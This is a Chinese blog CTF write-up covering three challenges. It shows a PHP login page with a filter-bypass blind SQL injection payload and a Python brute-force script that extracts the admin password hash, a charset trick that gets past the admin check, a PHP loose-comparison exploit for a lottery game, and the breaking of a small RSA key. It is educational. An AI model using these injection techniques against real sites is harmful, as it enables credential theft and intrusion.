<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">

<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">
<style>
    .pace .pace-progress {
        background: #1E92FB; /*进度条颜色*/
        height: 3px;
    }
    .pace .pace-progress-inner {
         box-shadow: 0 0 10px #1E92FB, 0 0 5px     #1E92FB; /*阴影颜色*/
    }
    .pace .pace-activity {
        border-top-color: #1E92FB;    /*上边框颜色*/
        border-left-color: #1E92FB;    /*左边框颜色*/
    }
</style>


  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">


  <link rel="manifest" href="/images/manifest.json">


  <meta name="msapplication-config" content="/images/browserconfig.xml" />



  <meta name="keywords" content="ctf," />










<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="wpsec-write up">
<meta property="og:url" content="http://yoursite.com/2018/07/18/wpsec/index.html">
<meta property="og:site_name" content="绝世狂龙">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9113981-130b657b9909b54d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9113981-2b111bd4c52a4e4f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9113981-89afc1db60884053.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9113981-e8d6d38796db0c01.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9113981-c7c4b178cb077d6d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9113981-41911cea1368e4cb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9113981-14f40d3d350538cf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9113981-a681e92228e5cfbb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9113981-588e1e952c60cbf0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9113981-5c9daa6d8fcac0d9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9113981-3c3134f09012c639.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9113981-ba79a9bc70f3996f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9113981-a3acb549e8e8952b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:updated_time" content="2018-10-05T10:01:33.009Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="wpsec-write up">
<meta name="twitter:image" content="https://upload-images.jianshu.io/upload_images/9113981-130b657b9909b54d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/07/18/wpsec/"/>






  <title>wpsec-write up | 绝世狂龙</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">绝世狂龙</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">今天很残酷，明天更残酷，但后天会很美好！</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-links">
          <a href="/links/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            友情链接
          </a>
        </li>
      
        
        <li class="menu-item menu-item-message">
          <a href="/message/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            留言
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/07/18/wpsec/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="berlin">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/zhenzhen.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="绝世狂龙">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">wpsec-write up</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-07-18T12:16:35+08:00">
                2018-07-18
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web安全/" itemprop="url" rel="index">
                    <span itemprop="name">web安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><img src="https://upload-images.jianshu.io/upload_images/9113981-130b657b9909b54d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"><br><a id="more"></a></p>
<h3 id="1-sql注入1"><a href="#1-sql注入1" class="headerlink" title="1.sql注入1"></a>1.sql注入1</h3><p><a href="http://47.106.142.99:8001" target="_blank" rel="noopener">题目地址</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span> </span><br><span class="line"><span class="keyword">include</span>(<span class="string">"config.php"</span>);</span><br><span class="line">$conn -&gt;query(<span class="string">"set names utf8"</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">randStr</span><span class="params">($lenth=<span class="number">32</span>)</span></span>&#123;</span><br><span class="line">    $strBase = <span class="string">"1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm"</span>;</span><br><span class="line">    $str = <span class="string">""</span>;</span><br><span class="line">    <span class="keyword">while</span>($lenth&gt;<span class="number">0</span>)&#123;</span><br><span class="line">      $str.=substr($strBase,rand(<span class="number">0</span>,strlen($strBase)<span class="number">-1</span>),<span class="number">1</span>);</span><br><span class="line">      $lenth --;</span><br><span class="line">    &#125;</span><br><span class="line">   <span class="keyword">return</span> $str;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>($install)&#123;</span><br><span class="line">    $sql = <span class="string">"create table `user` (</span></span><br><span class="line"><span class="string">         `id` int(10) unsigned NOT NULL PRIMARY KEY  AUTO_INCREMENT ,</span></span><br><span class="line"><span class="string">         `username` varchar(30) NOT NULL,</span></span><br><span class="line"><span class="string">         `passwd` varchar(32) NOT NULL,</span></span><br><span class="line"><span class="string">         `role` varchar(30) NOT NULL</span></span><br><span class="line"><span class="string">       )ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci "</span>;</span><br><span class="line">    <span class="keyword">if</span>($conn-&gt;query($sql))&#123;</span><br><span class="line">       $sql  = <span class="string">"insert into `user`(`username`,`passwd`,`role`) values ('admin','"</span>.md5(randStr()).<span class="string">"','admin')"</span>;</span><br><span class="line">       $conn -&gt; query($sql);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span><span class="params">($str)</span></span>&#123;</span><br><span class="line">     $filter = <span class="string">"/ |\*|#|;|,|is|union|like|regexp|for|and|or|file|--|\||`|&amp;|"</span>.urldecode(<span class="string">'%09'</span>).<span class="string">"|"</span>.urldecode(<span class="string">"%0a"</span>).<span class="string">"|"</span>.urldecode(<span class="string">"%0b"</span>).<span class="string">"|"</span>.urldecode(<span class="string">'%0c'</span>).<span class="string">"|"</span>.urldecode(<span class="string">'%0d'</span>).<span class="string">"|"</span>.urldecode(<span class="string">'%a0'</span>).<span class="string">"/i"</span>; </span><br><span class="line">     <span class="keyword">if</span>(preg_match($filter,$str))&#123;</span><br><span class="line">         <span class="keyword">die</span>(<span class="string">"you can't input this illegal char!"</span>);</span><br><span class="line">     &#125;</span><br><span class="line">     <span class="keyword">return</span> $str; </span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">show</span><span class="params">($username)</span></span>&#123;</span><br><span class="line">  <span class="keyword">global</span> $conn;</span><br><span class="line">  $sql = <span class="string">"select role from `user` where username ='"</span>.$username.<span class="string">"'"</span>;</span><br><span class="line">  $res = $conn -&gt;query($sql);</span><br><span class="line">  <span class="keyword">if</span>($res-&gt;num_rows&gt;<span class="number">0</span>)&#123;</span><br><span class="line">      <span class="keyword">echo</span> <span class="string">"$username is "</span>.$res-&gt;fetch_assoc()[<span class="string">'role'</span>];</span><br><span class="line">  &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">      <span class="keyword">die</span>(<span class="string">"Don't have this user!"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">login</span><span class="params">($username,$passwd)</span></span>&#123;</span><br><span class="line">    <span class="keyword">global</span> $conn;</span><br><span class="line">    <span class="keyword">global</span> $flag;</span><br><span class="line">    $username = trim(strtolower($username));</span><br><span class="line">    $passwd = trim(strtolower($passwd));</span><br><span class="line">    <span class="keyword">if</span>($username == <span class="string">'admin'</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"you can't login this as admin!"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    $sql = <span class="string">"select * from `user` where username='"</span>.$conn-&gt;escape_string($username).<span class="string">"' and passwd='"</span>.$conn-&gt;escape_string($passwd).<span class="string">"'"</span>;</span><br><span class="line">    $res = $conn -&gt;query($sql);</span><br><span class="line">    <span class="keyword">if</span>($res-&gt;num_rows&gt;<span class="number">0</span>)&#123;</span><br><span class="line">        <span class="keyword">if</span>($res-&gt;fetch_assoc()[<span class="string">'role'</span>] === <span class="string">'admin'</span>) <span class="keyword">exit</span>($flag);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">       <span class="keyword">echo</span> <span class="string">"sorry,username or passwd error!"</span>;  </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">source</span><span class="params">()</span></span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line">$username = <span class="keyword">isset</span>($_POST[<span class="string">'username'</span>])?filter($_POST[<span class="string">'username'</span>]):<span class="string">""</span>;</span><br><span class="line">$passwd = <span class="keyword">isset</span>($_POST[<span class="string">'passwd'</span>])?filter($_POST[<span class="string">'passwd'</span>]):<span class="string">""</span>;</span><br><span class="line">$action = <span class="keyword">isset</span>($_GET[<span class="string">'action'</span>])?filter($_GET[<span class="string">'action'</span>]):<span class="string">"source"</span>;</span><br><span class="line"><span class="keyword">switch</span>($action)&#123;</span><br><span class="line">   <span class="keyword">case</span> <span class="string">"source"</span>: source(); <span class="keyword">break</span> ;</span><br><span class="line">   <span class="keyword">case</span> <span class="string">"login"</span> : login($username,$passwd);<span class="keyword">break</span>;</span><br><span class="line">   <span class="keyword">case</span> <span class="string">"show"</span> : show($username);<span class="keyword">break</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>先看一遍代码知道基本意思，这道题一看是一道登录题，而且涉及sql注入，让我们输入账号密码然后可以看到flag，但没那么简单，做了很多过滤，密码也是随机。<br>通过测试发现action=show页面可以进行注入，但过滤了很多东西。<br>通过查找，发现/和and相同,由于末尾有’只能用1=1=1逻辑进行绕过<br>需要注意以下几点<br>1.数据库不会内容变<br>2.show函数可以注入能用的字符串有select from () substr ’<br>3.show 可以盲注</p>
<p>盲注姿势<br>1.绕过，利用substr(user())from(1)<br>2.绕过空格 利用（）<br>3.闭合引号，因为没有注释符所以只能用连等式<br>4.连接符选择 使用/连接</p>
<p>找盲注点<br><img src="https://upload-images.jianshu.io/upload_images/9113981-2b111bd4c52a4e4f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>然后通过注入去找密码<br>username=admin’/1=(ascii(substr((select(passwd)from(user))from(1)))&gt;1)/‘1’=’1<br><img src="https://upload-images.jianshu.io/upload_images/9113981-89afc1db60884053.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>写盲注脚本<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">string = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">33</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">126</span>):</span><br><span class="line">        url=<span class="string">"http://47.106.142.99:8001//?action=show"</span></span><br><span class="line">        s1 = <span class="string">"admin'/1=(ascii(substr((select(passwd)from(user))from(&#123;&#125;)))=&#123;&#125;)/'1'='1"</span>.format(str(i),j)</span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">'username'</span>:s1</span><br><span class="line">        &#125;</span><br><span class="line">        s=requests.post(url=url,data=data)</span><br><span class="line">        content=s.content</span><br><span class="line">        length=len(content)</span><br><span class="line">        <span class="comment">#print (length)</span></span><br><span class="line">        <span class="keyword">if</span> length != <span class="number">21</span>:</span><br><span class="line">            string+=chr(j)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">print</span> (string)</span><br></pre></td></tr></table></figure></p>
<p><img src="https://upload-images.jianshu.io/upload_images/9113981-e8d6d38796db0c01.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>
<p>passwd=f0e83b36f00766c62829608a483f7065<br>下一步用password登录admin，但发现<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>($username == <span class="string">'admin'</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"you can't login this as admin!"</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $sql = <span class="string">"select * from `user` where username='"</span>.$conn-&gt;escape_string($username).<span class="string">"' and passwd='"</span>.$conn-&gt;escape_string($passwd).<span class="string">"'"</span>;</span><br></pre></td></tr></table></figure></p>
<p>发现不能直接用admin登录<br>必须利用字符集特征绕过此判断<br>就是admin%c2 在php中就不为admin，但在mysql查询的就是为admin，所以可以绕过<br>原因就是Mysql字段的字符集和php mysqli客户端设置的字符集不相同。Mysql在转换字符集的时候，将不完整的字符给忽略了。<br><img src="https://upload-images.jianshu.io/upload_images/9113981-c7c4b178cb077d6d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>抓包<br>username=admin%c2&amp;passwd=f0e83b36f00766c62829608a483f7065<br><img src="https://upload-images.jianshu.io/upload_images/9113981-41911cea1368e4cb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>
<h3 id="2-来买彩票啊"><a href="#2-来买彩票啊" class="headerlink" title="2.来买彩票啊"></a>2.来买彩票啊</h3><p>这题注册后，会让你去买彩票，7个号，自带20元，每次用两元，一等奖500万，而flag卖999万元，很明显中两次一等奖就行了，但你会中吗？所以不能老老实实的买，开挂吧。</p>
<p>先尝试买一次<br><img src="https://upload-images.jianshu.io/upload_images/9113981-14f40d3d350538cf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>就中一个，靠运气是不可能了。。<br>开挂后会发现这题应该考的是数字之间的比较，只要最后结果返回正确，不就中奖了。。<br>因此这题考的应该是php弱类型之间的比较<br>了解：<br>php一个数字和一个字符串进行比较或者进行运算时，PHP会把字符串转换成数字再进行比较。PHP转换的规则的是：若字符串以数字开头，则取开头数字作为转换结果，若无则输出0。<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">var_dump(<span class="string">"admin"</span>==<span class="number">0</span>);  <span class="comment">//true</span></span><br><span class="line">var_dump(<span class="string">"1admin"</span>==<span class="number">1</span>); <span class="comment">//true</span></span><br><span class="line">var_dump(<span class="string">"admin1"</span>==<span class="number">1</span>) <span class="comment">//false</span></span><br><span class="line">var_dump(<span class="string">"admin1"</span>==<span class="number">0</span>) <span class="comment">//true</span></span><br><span class="line">var_dump(<span class="string">"0e123456"</span>==<span class="string">"0e4456789"</span>); <span class="comment">//true </span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>例如：123abc转换后应该是123，而abc则为0，0==0这当然是成立的.具体可以参考官方手册：如果比较一个整数和字符串，则字符串会被转换为整数<br>这题虽然没用到，原理都是一样<br>使用php弱类型比较，例”1”,和 true,1,”1”都是相等的。相反0与false是相等的。<br>抓包修改号码为true,如果有1对应true,则返回结果为正确，中奖。<br>{“action”:”buy”,”numbers”:[true,true,true,true,true,true,true]}<br><img src="https://upload-images.jianshu.io/upload_images/9113981-a681e92228e5cfbb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>
<p><img src="https://upload-images.jianshu.io/upload_images/9113981-588e1e952c60cbf0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>
<p><img src="https://upload-images.jianshu.io/upload_images/9113981-5c9daa6d8fcac0d9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>
<p>flag…..<br><img src="https://upload-images.jianshu.io/upload_images/9113981-3c3134f09012c639.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>
<h3 id="3-RSA"><a href="#3-RSA" class="headerlink" title="3.RSA"></a>3.RSA</h3><p>这题考的是rsa加密算法，不懂先去了解，看的头皮发麻<br>推荐：<a href="https://baijiahao.baidu.com/s?id=1565730621502294&amp;wfr=spider&amp;for=pc" target="_blank" rel="noopener">RSA加密算法</a><br><img src="https://upload-images.jianshu.io/upload_images/9113981-ba79a9bc70f3996f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"><br>可以看到给出了公钥和密文，想要破解密文需要知道密钥，根据RSA算法便可以知道，由公钥是可能获取到密钥的，前提是公钥中的920139713是不能太大，并可以因数分解成两个数。<br>首先要明白几个公式<br><strong>公钥(n,e)  ，  密钥(n,d) ，  e为随机选的和φ(n)的互质数 ，d为e对φ(n)的模反元素，m在这没有用仅是个参数</strong></p>
<blockquote>
<p>n=p<em>q<br>φ(n)=(p-1)</em>(q-1)<br>ed+φ(n)m=1（e,φ(n)已知后，便可以计算d,m的值，可看出模反元素是不唯一）</p>
</blockquote>
<p>很明显想知道密钥，先要知道d，想知道d就要知道φ(n)，也就是要知道p,q，就是n因数分解后的两个数<br>在本题中就是920139713分解后的，<br>首先分解模数n,这里我们可以采用在线分解模数的方法，推荐链接：<a href="http://www.factordb.com/index.php" target="_blank" rel="noopener">http://www.factordb.com/index.php</a><br>之后我们可以得到分解后的p与q的值为18443 和49891，即920139713=18443*49891<br>我们使用一个Python编写一个简易的脚本来求解d<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line">p =gmpy2.mpz(<span class="number">18443</span>)</span><br><span class="line">q =gmpy2.mpz(<span class="number">49891</span>)</span><br><span class="line">e =gmpy2.mpz(<span class="number">19</span>)</span><br><span class="line">phi_n= (p - <span class="number">1</span>) * (q - <span class="number">1</span>)</span><br><span class="line">d = gmpy2.invert(e, phi_n)</span><br><span class="line">print(<span class="string">"d is:"</span>)</span><br><span class="line"><span class="keyword">print</span> (d)</span><br></pre></td></tr></table></figure></p>
<p>得到d的值：d=96849619<br>d得出后，密钥也知道了(920139713,96849619)<br>将密文保存在txt中通过脚本跑出来<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line">n = <span class="number">920139713</span></span><br><span class="line">d = <span class="number">96849619</span></span><br><span class="line">result = []</span><br><span class="line"><span class="keyword">with</span> open(<span class="string">"rsa.txt"</span>) <span class="keyword">as</span> f:</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> f:</span><br><span class="line">        result.append(chr(pow(int(i),d,n)))</span><br><span class="line"></span><br><span class="line">print(result)</span><br></pre></td></tr></table></figure></p>
<p><img src="https://upload-images.jianshu.io/upload_images/9113981-a3acb549e8e8952b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>flag…</p>

      
    </div>
    
    
    
		
		<div>
      
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

  <!-- JS库 sweetalert 可修改路径 -->
  <script src="https://cdn.bootcss.com/jquery/2.0.0/jquery.min.js"></script>
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  <p><span>本文标题:</span><a href="/2018/07/18/wpsec/">wpsec-write up</a></p>
  <p><span>文章作者:</span><a href="/" title="访问 berlin 的个人博客">berlin</a></p>
  <p><span>发布时间:</span>2018年07月18日 - 12:07</p>
  <p><span>最后更新:</span>2018年10月05日 - 18:10</p>
  <p><span>原始链接:</span><a href="/2018/07/18/wpsec/" title="wpsec-write up">http://yoursite.com/2018/07/18/wpsec/</a>
    <span class="copy-path"  title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="http://yoursite.com/2018/07/18/wpsec/"  aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>  
</div>
<script> 
    var clipboard = new Clipboard('.fa-clipboard');
      $(".fa-clipboard").click(function(){
      clipboard.on('success', function(){
        swal({   
          title: "",   
          text: '复制成功',
          icon: "success", 
          showConfirmButton: true
          });
        });
    });  
</script>

      
    </div> 
		
    
		
		<div>
    
    <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
    
    </div>

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"><i class="fa fa-tag"></i> ctf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/06/28/Drupal/" rel="next" title="Drupal远程命令执行漏洞复现">
                <i class="fa fa-chevron-left"></i> Drupal远程命令执行漏洞复现
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/09/13/CBC/" rel="prev" title="CBC字节翻转攻击">
                CBC字节翻转攻击 <i class="fa fa-chevron-right"></i>
              </a>
